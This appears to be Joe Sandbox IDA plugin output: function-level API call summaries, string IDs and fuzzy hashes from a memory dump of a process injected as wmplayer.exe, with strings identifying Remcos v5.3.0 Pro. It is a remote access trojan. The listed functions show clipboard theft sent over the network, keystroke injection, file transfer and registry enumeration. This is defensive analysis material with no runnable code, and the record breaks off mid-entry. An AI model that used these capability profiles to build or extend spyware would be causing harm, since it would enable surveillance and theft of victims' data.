                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                            • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                            • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                            • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
• __alloca_probe_16.LIBCMT ref: 00452C91
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
• __alloca_probe_16.LIBCMT ref: 00452D3B
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
• __freea.LIBCMT ref: 00452DAA
• __freea.LIBCMT ref: 00452DB6
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• API String ID: 201697637-0
• Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
• Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
• Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
Memory Dump Source
• Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• API String ID: 1454806937-0
• Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
• Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• _memcmp.LIBVCRUNTIME ref: 004446A3
• _free.LIBCMT ref: 00444714
• _free.LIBCMT ref: 0044472D
• _free.LIBCMT ref: 0044475F
• _free.LIBCMT ref: 00444768
• _free.LIBCMT ref: 00444774
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
• Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
• Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
• Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• String ID: tcp$udp
• API String ID: 0-3725065008
• Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
• Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
• Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
APIs
• ExitThread.KERNEL32 ref: 004017F4
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
• waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• __Init_thread_footer.LIBCMT ref: 004017BC
  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: T=G$p[G$>G$>G
• API String ID: 1596592924-2461731529
• Opcode ID: 7bd150d22899eca206633265e7980286f0d125ca65ed8114f89ceea82a31b6e2
• Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
• Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: 98875dd672773ca9856db277106ed48cc003e9625aa19374f5a38d449972a537
• Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
• Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
• _wcslen.LIBCMT ref: 0041A8F6
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
• String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 3286818993-703403762
• Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
• Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
• Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
APIs
• AllocConsole.KERNEL32(00474358), ref: 0041BEB9
• GetConsoleWindow.KERNEL32 ref: 0041BEBF
• ShowWindow.USER32(00000000,00000000), ref: 0041BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 4067487056-2527699604
• Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
• Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                            • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                            • __freea.LIBCMT ref: 00449B37
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • __freea.LIBCMT ref: 00449B40
                                                                                            • __freea.LIBCMT ref: 00449B65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3864826663-0
                                                                                            • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                            • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                            • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                            • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                            APIs
                                                                                            • SendInput.USER32 ref: 00418B08
                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                              • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InputSend$Virtual
                                                                                            • String ID:
                                                                                            • API String ID: 1167301434-0
                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                            • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                            • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                            APIs
                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                            • String ID:
                                                                                            • API String ID: 2172192267-0
                                                                                            • Opcode ID: aaa85fb431374b74e5b3230706668e782439e027beb02df1b6a3a4d771b327f5
                                                                                            • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                            • Opcode Fuzzy Hash: aaa85fb431374b74e5b3230706668e782439e027beb02df1b6a3a4d771b327f5
                                                                                            • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00447EBC
                                                                                            • _free.LIBCMT ref: 00447EE0
                                                                                            • _free.LIBCMT ref: 00448067
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                            • _free.LIBCMT ref: 00448233
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                            • String ID:
                                                                                            • API String ID: 314583886-0
                                                                                            • Opcode ID: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                            • Opcode Fuzzy Hash: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                            • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                            • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                            • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                            APIs
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • _free.LIBCMT ref: 00444086
                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$AllocateHeap
                                                                                            • String ID: J7D
                                                                                            • API String ID: 3033488037-1677391033
                                                                                            • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                            • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                            • __fassign.LIBCMT ref: 0044A180
                                                                                            • __fassign.LIBCMT ref: 0044A19B
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                            • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                            • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: HE$HE
                                                                                            • API String ID: 269201875-1978648262
                                                                                            • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                            • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                            • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                            • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                            • __fassign.LIBCMT ref: 1000954F
                                                                                            • __fassign.LIBCMT ref: 1000956A
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                            • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                            • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                            • String ID: TUFTUF$>G$DG$DG
